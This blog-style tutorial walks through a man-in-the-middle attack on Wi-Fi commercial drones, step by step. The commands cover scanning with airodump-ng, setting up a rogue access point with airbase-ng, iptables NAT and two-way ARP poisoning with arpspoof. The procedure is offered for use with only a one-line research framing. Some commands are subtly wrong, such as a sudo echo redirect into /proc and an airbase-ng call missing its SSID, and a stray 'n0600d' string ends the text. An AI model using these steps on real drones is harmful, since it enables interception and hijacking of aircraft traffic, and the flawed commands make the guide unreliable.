Introduction:
As the usage of commercial drones continues to soar, it becomes increasingly crucial to understand and mitigate potential cybersecurity threats associated with these unmanned aerial vehicles (UAVs). In this blog post, we will explore the usage of Wireshark as a powerful tool for conducting man-in-the-middle (MITM) attacks on commercial drones. We will provide step-by-step instructions, including detailed commands, for conducting MITM attacks using Wireshark, and delve into the technical aspects for readers with a solid background in cybersecurity.
Prerequisites:
To follow along with this guide, you will need the following:
1. A computer running a Linux distribution (e.g., Ubuntu, Kali Linux) or Windows with the latest version of Wireshark installed.
2. A compatible wireless network interface card (NIC) capable of packet capturing (e.g., Alfa AWUS036ACH).
3. A drone with Wi-Fi capabilities (preferably a commercial drone for testing purposes).
Step 1: Setting Up the Environment
1. Ensure that your computer is connected to the internet and has Wi-Fi capabilities.
2. Connect the wireless NIC to your computer.
3. Install the necessary drivers for the wireless NIC, if required.
Step 2: Prepare the MITM Attack
1. Launch Wireshark on your computer.
2. Click on "Capture" and select the appropriate wireless NIC for packet capturing.
3. Start capturing packets by clicking on the "Start" button.
Step 3: Identify the Target Drone
1. Activate the Wi-Fi connection on the drone.
2. Use the available tools (e.g., `airodump-ng`) to scan for nearby Wi-Fi networks and identify the drone's SSID (Service Set Identifier).
sudo airodump-ng <interface>
3. Note down the MAC address and channel of the drone.
Step 4: Set Up the MITM Attack
1. Open a new terminal and configure your wireless NIC in monitor mode on the same channel as the drone.
sudo airmon-ng start <interface> <channel>
2. Start capturing the drone's traffic.
sudo airodump-ng -c <channel> --bssid <drone_bssid> -w <output_file> <interface>
Step 5: Create the Rogue Access Point (AP)
1. Open a new terminal and configure your wireless NIC to create a rogue AP.
sudo airbase-ng -e <rogue_ap_ssid> -c <channel> <interface>
2. Start the rogue AP.
sudo airbase-ng -P -C 30 -vv <interface>
Step 6: Establish MITM Attack
1. Enable IP forwarding to allow traffic to flow through your computer.
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
2. Enable IPTables rules for forwarding and NATing.
sudo iptables -t nat -A POSTROUTING -o <interface> -j MASQUERADE
sudo iptables -A FORWARD -i <interface> -o <interface> -j ACCEPT
3. Poison the drone's ARP cache to redirect traffic to your rogue AP.
sudo arpspoof -i <interface> -t <drone_ip> <gateway_ip>
4. Poison the gateway's ARP cache to redirect traffic back to the drone.
sudo arpspoof -i <interface> -t <gateway_ip> <drone_ip>
Step 7: Analyze Captured Traffic with Wireshark
1. Stop capturing packets in the first Wireshark instance.
2. Open the captured packet file in Wireshark for analysis.
3. Inspect the captured packets to gain insights into the drone's communication, vulnerabilities, and potential security weaknesses.
Conclusion:
Wireshark serves as a valuable tool for conducting cybersecurity research on commercial drones, enabling researchers to identify vulnerabilities and develop effective countermeasures.
n0600d




